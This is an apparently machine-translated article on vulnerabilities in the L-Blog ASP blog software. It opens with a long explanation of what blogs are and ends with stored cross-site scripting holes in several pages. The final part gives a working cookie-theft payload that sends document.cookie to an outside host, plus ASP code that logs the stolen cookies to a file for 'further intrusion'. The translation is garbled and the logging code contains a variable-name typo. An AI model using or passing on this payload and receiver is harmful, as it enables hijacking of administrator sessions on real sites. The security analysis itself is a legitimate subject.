Introduction and repair of l-blog Vulnerability (graph)-Vulnerability research

First of all, what is the blog (blog)? Because a lot of people don't know what a blog is? Even after reading this article do not understand, so waste some space!
Interpretation:
Online Publishing (Web Publishing), publishing, and Posting (post--when nouns refer to posts) is a rapidly growing network activity, and there is even a proper noun--weblog, or blog, used to refer to the publication and publication of such a network. A blog is a Web page that is usually made up of short, frequently updated posts, which are arranged by year and date. Blogs are very different in content and purpose, from hyperlinks and comments to other websites about companies, individuals, ideas, news to diaries, photos, poetry, prose, and even science fiction publishing or posting. Many blogs are published in the minds of the individual, while others are blogs by a group of people based on a particular subject or area of common interest. Blogs seem to convey real-time messages to the network. Those who write these weblog or blogs are called bloggers or blog writer. The idea of blogging on the web was made in 1998, but it was 2000 years before it really started to pop. At first, bloggers recorded his daily views and opinions on the site and made it public to refer to others and follow them. But with the rapid expansion of blogging, its purpose is far from the original. At present, thousands of bloggers on the internet have a great difference in the purpose of publishing and posting blogs. However, because communication is simpler and easier than email and discussion groups, blogging has become an increasingly popular tool for communication between families, companies, departments, and teams, as it is also being applied to the corporate intranet.
Now on the network to use the blog program is roughly divided into multi-user and Single-user two versions, the ASP's blog program and version are more, naturally there will be a variety of loopholes Ah! Now the mainstream of the ASP blog program has the following several:

1.l-blog (Loveyuki written asp+access architecture), this program is modified as well as landscaping version n more
2.o-blog (Yechai-asp+access/sql Architecture multiple users)
3.Misslong (multi-user version)
4.theanswer ' s Blog (Foreign Open Source website Project program, careful and Concise code)
5.SIC ' s blog (l-blog modified version, security performance than the original strong)
6.Dlong (Pig fly to write the program belongs to the earlier blog program, stopped developing)

I will take the l-blog procedure to carry on the analysis! See how many problems we have in our l-blog?

I. L-blog procedural vulnerabilities. (Cross-site Scripting vulnerability)
The most widely used program will have more vulnerabilities exist, we l-blog program is the same AH!! The first thing to look at is the basic vulnerability across-site scripting vulnerability, in member.asp/favorite.asp/ Bloglinks.asp Page found that the author did not in order to prevent the vulnerability of cross-site scripting, so completely did not filter any sensitive characters, so that we can carry out the theft of cookies, as well as the destruction of the blog!
We take the member.asp page's "Personal homepage" column as an example, we found that as long as the importation of specific malicious code, this way you can get the administrator of the cookie or damage! For example: <script>alert ("TEST"). By. h4k_b4n ");</script> in the Personal homepage section



When the administrator or other users look at our set of account data, the code will be activated, which completes the cross-show script attack!


In three pages, the most harmful is bloglinks.asp add the Connection page, as long as the address of the application connection to enter malicious code, you can directly get the administrator's cookie, because each connection needs to be audited by the Administrator to be able to, this way, whenever the administrator landing admincp.asp Management background related pages The face will start the code to get the cookies we need!
The code is as follows:
<script> document.location= ' http://yoursite.com/cookie.asp? ' %2bdocument.cookie
</script>

Cookie page Code:
<%
Testfile=server.mappath ("Info.txt")
Msg=request.servervariables ("Query_string")
Set fs=server.createobject ("Scripting.FileSystemObject")
Set Thisfile=fs.opentextfile (testfile,8,true,0)
Thidfile.writeline ("&msg&")
Thisfile.close
Set fs=nothing
%>
Using the above code, we can easily get the administrator's cookie information, for further intrusion.